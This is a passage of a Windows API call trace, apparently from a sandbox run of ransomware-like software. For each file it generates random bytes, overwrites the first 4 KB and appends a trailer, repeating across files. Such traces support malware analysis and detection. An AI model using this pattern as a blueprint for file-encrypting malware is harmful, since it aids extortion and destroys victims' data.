returned 0x4f70a70 [0081.431] GetProcessHeap () returned 0x4f10000 [0081.431] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0081.431] GetProcessHeap () returned 0x4f10000 [0081.431] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0081.431] GetProcessHeap () returned 0x4f10000 [0081.431] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0081.431] GetProcessHeap () returned 0x4f10000 [0081.431] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.431] GetProcessHeap () returned 0x4f10000 [0081.431] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0081.431] GetProcessHeap () returned 0x4f10000 [0081.431] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.431] GetProcessHeap () returned 0x4f10000 [0081.431] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.431] GetProcessHeap () returned 0x4f10000 [0081.431] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.431] GetProcessHeap () returned 0x4f10000 [0081.431] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.431] GetProcessHeap () returned 0x4f10000 [0081.431] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.432] GetProcessHeap () returned 0x4f10000 [0081.432] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.432] GetProcessHeap () returned 0x4f10000 [0081.432] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.432] GetProcessHeap () returned 0x4f10000 [0081.432] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.432] GetProcessHeap () returned 0x4f10000 [0081.432] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.432] GetProcessHeap () returned 0x4f10000 [0081.432] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.432] GetProcessHeap () returned 0x4f10000 [0081.432] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.432] GetProcessHeap () returned 0x4f10000 [0081.432] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.432] GetProcessHeap () returned 0x4f10000 [0081.432] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.432] GetProcessHeap () returned 0x4f10000 [0081.432] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.432] GetProcessHeap () returned 0x4f10000 [0081.432] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.432] GetProcessHeap () returned 0x4f10000 [0081.432] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.432] GetProcessHeap () returned 0x4f10000 [0081.432] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.432] GetProcessHeap () returned 0x4f10000 [0081.432] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.432] GetProcessHeap () returned 0x4f10000 [0081.432] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.432] GetProcessHeap () returned 0x4f10000 [0081.432] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.433] GetProcessHeap () returned 0x4f10000 [0081.433] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.433] GetProcessHeap () returned 0x4f10000 [0081.433] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.433] GetProcessHeap () returned 0x4f10000 [0081.433] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.433] GetProcessHeap () returned 0x4f10000 [0081.433] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.433] GetProcessHeap () returned 0x4f10000 [0081.433] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0081.433] GetProcessHeap () returned 0x4f10000 [0081.433] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.433] GetProcessHeap () returned 0x4f10000 [0081.433] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0081.433] GetProcessHeap () returned 0x4f10000 [0081.433] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0081.433] GetProcessHeap () returned 0x4f10000 [0081.433] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0081.433] GetProcessHeap () returned 0x4f10000 [0081.433] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0081.433] SetFilePointerEx (in: hFile=0x880, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.433] WriteFile (in: hFile=0x880, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0081.433] WriteFile (in: hFile=0x880, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0081.433] GetProcessHeap () returned 0x4f10000 [0081.433] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0081.433] GetProcessHeap () returned 0x4f10000 [0081.434] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0081.434] GetProcessHeap () returned 0x4f10000 [0081.434] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0081.434] CloseHandle (hObject=0x880) returned 1 [0081.435] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 65 [0081.435] SetFilePointerEx (in: hFile=0x884, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.435] ReadFile (in: hFile=0x884, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0081.435] SetFilePointerEx (in: hFile=0x884, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.435] GetProcessHeap () returned 0x4f10000 [0081.435] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0081.435] GetProcessHeap () returned 0x4f10000 [0081.435] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0081.435] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0081.435] GetProcessHeap () returned 0x4f10000 [0081.435] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0081.435] ReadFile (in: hFile=0x884, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0081.483] SetFilePointerEx (in: hFile=0x884, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.483] WriteFile (in: hFile=0x884, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0081.483] GetProcessHeap () returned 0x4f10000 [0081.483] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0081.483] GetProcessHeap () returned 0x4f10000 [0081.483] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0081.483] GetProcessHeap () returned 0x4f10000 [0081.483] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0081.483] GetProcessHeap () returned 0x4f10000 [0081.483] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0081.483] GetProcessHeap () returned 0x4f10000 [0081.483] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0081.483] GetProcessHeap () returned 0x4f10000 [0081.483] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0081.483] GetProcessHeap () returned 0x4f10000 [0081.483] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.483] GetProcessHeap () returned 0x4f10000 [0081.483] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.483] GetProcessHeap () returned 0x4f10000 [0081.483] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.483] GetProcessHeap () returned 0x4f10000 [0081.484] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.484] GetProcessHeap () returned 0x4f10000 [0081.484] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.484] GetProcessHeap () returned 0x4f10000 [0081.484] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.484] GetProcessHeap () returned 0x4f10000 [0081.484] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.484] GetProcessHeap () returned 0x4f10000 [0081.484] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.484] GetProcessHeap () returned 0x4f10000 [0081.484] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.484] GetProcessHeap () returned 0x4f10000 [0081.484] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.484] GetProcessHeap () returned 0x4f10000 [0081.484] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.484] GetProcessHeap () returned 0x4f10000 [0081.484] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.484] GetProcessHeap () returned 0x4f10000 [0081.484] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.484] GetProcessHeap () returned 0x4f10000 [0081.484] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.484] GetProcessHeap () returned 0x4f10000 [0081.484] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.484] GetProcessHeap () returned 0x4f10000 [0081.484] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.484] GetProcessHeap () returned 0x4f10000 [0081.484] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.484] GetProcessHeap () returned 0x4f10000 [0081.484] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.484] GetProcessHeap () returned 0x4f10000 [0081.484] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.484] GetProcessHeap () returned 0x4f10000 [0081.484] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.484] GetProcessHeap () returned 0x4f10000 [0081.484] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.484] GetProcessHeap () returned 0x4f10000 [0081.484] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.484] GetProcessHeap () returned 0x4f10000 [0081.484] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.484] GetProcessHeap () returned 0x4f10000 [0081.485] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.485] GetProcessHeap () returned 0x4f10000 [0081.485] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.485] GetProcessHeap () returned 0x4f10000 [0081.485] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.485] GetProcessHeap () returned 0x4f10000 [0081.485] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.485] GetProcessHeap () returned 0x4f10000 [0081.485] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.485] GetProcessHeap () returned 0x4f10000 [0081.485] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.485] GetProcessHeap () returned 0x4f10000 [0081.485] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.485] GetProcessHeap () returned 0x4f10000 [0081.485] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.485] GetProcessHeap () returned 0x4f10000 [0081.485] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.485] GetProcessHeap () returned 0x4f10000 [0081.485] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0081.485] GetProcessHeap () returned 0x4f10000 [0081.485] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.485] GetProcessHeap () returned 0x4f10000 [0081.485] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0081.485] GetProcessHeap () returned 0x4f10000 [0081.485] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0081.485] GetProcessHeap () returned 0x4f10000 [0081.485] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0081.485] GetProcessHeap () returned 0x4f10000 [0081.485] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0081.485] GetProcessHeap () returned 0x4f10000 [0081.485] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0081.485] GetProcessHeap () returned 0x4f10000 [0081.485] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0081.485] GetProcessHeap () returned 0x4f10000 [0081.485] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.485] GetProcessHeap () returned 0x4f10000 [0081.485] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0081.485] GetProcessHeap () returned 0x4f10000 [0081.485] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.486] GetProcessHeap () returned 0x4f10000 [0081.486] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.486] GetProcessHeap () returned 0x4f10000 [0081.486] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.486] GetProcessHeap () returned 0x4f10000 [0081.486] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.486] GetProcessHeap () returned 0x4f10000 [0081.486] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.486] GetProcessHeap () returned 0x4f10000 [0081.486] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.486] GetProcessHeap () returned 0x4f10000 [0081.486] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.486] GetProcessHeap () returned 0x4f10000 [0081.486] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.486] GetProcessHeap () returned 0x4f10000 [0081.486] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.486] GetProcessHeap () returned 0x4f10000 [0081.486] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.486] GetProcessHeap () returned 0x4f10000 [0081.486] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.486] GetProcessHeap () returned 0x4f10000 [0081.486] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.486] GetProcessHeap () returned 0x4f10000 [0081.486] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.486] GetProcessHeap () returned 0x4f10000 [0081.486] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.486] GetProcessHeap () returned 0x4f10000 [0081.486] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.486] GetProcessHeap () returned 0x4f10000 [0081.487] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.487] GetProcessHeap () returned 0x4f10000 [0081.487] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.487] GetProcessHeap () returned 0x4f10000 [0081.487] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.487] GetProcessHeap () returned 0x4f10000 [0081.487] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.487] GetProcessHeap () returned 0x4f10000 [0081.487] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.487] GetProcessHeap () returned 0x4f10000 [0081.487] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.487] GetProcessHeap () returned 0x4f10000 [0081.487] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.487] GetProcessHeap () returned 0x4f10000 [0081.487] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.487] GetProcessHeap () returned 0x4f10000 [0081.487] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.487] GetProcessHeap () returned 0x4f10000 [0081.487] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0081.487] GetProcessHeap () returned 0x4f10000 [0081.487] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.487] GetProcessHeap () returned 0x4f10000 [0081.487] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0081.487] GetProcessHeap () returned 0x4f10000 [0081.487] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0081.487] GetProcessHeap () returned 0x4f10000 [0081.487] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0081.487] GetProcessHeap () returned 0x4f10000 [0081.487] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0081.487] SetFilePointerEx (in: hFile=0x884, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.488] WriteFile (in: hFile=0x884, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0081.488] WriteFile (in: hFile=0x884, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0081.488] GetProcessHeap () returned 0x4f10000 [0081.488] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0081.488] GetProcessHeap () returned 0x4f10000 [0081.488] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0081.488] GetProcessHeap () returned 0x4f10000 [0081.488] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0081.488] CloseHandle (hObject=0x884) returned 1 [0081.489] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 66 [0081.489] SetFilePointerEx (in: hFile=0x888, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.489] ReadFile (in: hFile=0x888, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0081.489] SetFilePointerEx (in: hFile=0x888, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.489] GetProcessHeap () returned 0x4f10000 [0081.489] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0081.489] GetProcessHeap () returned 0x4f10000 [0081.489] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0081.489] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0081.489] GetProcessHeap () returned 0x4f10000 [0081.489] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0081.489] ReadFile (in: hFile=0x888, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0081.537] SetFilePointerEx (in: hFile=0x888, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.537] WriteFile (in: hFile=0x888, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0081.537] GetProcessHeap () returned 0x4f10000 [0081.537] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0081.537] GetProcessHeap () returned 0x4f10000 [0081.537] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0081.537] GetProcessHeap () returned 0x4f10000 [0081.537] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0081.537] GetProcessHeap () returned 0x4f10000 [0081.537] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0081.537] GetProcessHeap () returned 0x4f10000 [0081.537] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0081.537] GetProcessHeap () returned 0x4f10000 [0081.537] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0081.537] GetProcessHeap () returned 0x4f10000 [0081.538] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.538] GetProcessHeap () returned 0x4f10000 [0081.538] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.538] GetProcessHeap () returned 0x4f10000 [0081.538] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.538] GetProcessHeap () returned 0x4f10000 [0081.538] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.538] GetProcessHeap () returned 0x4f10000 [0081.538] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.538] GetProcessHeap () returned 0x4f10000 [0081.538] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.538] GetProcessHeap () returned 0x4f10000 [0081.538] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.538] GetProcessHeap () returned 0x4f10000 [0081.538] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.538] GetProcessHeap () returned 0x4f10000 [0081.538] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.538] GetProcessHeap () returned 0x4f10000 [0081.538] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.538] GetProcessHeap () returned 0x4f10000 [0081.538] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.538] 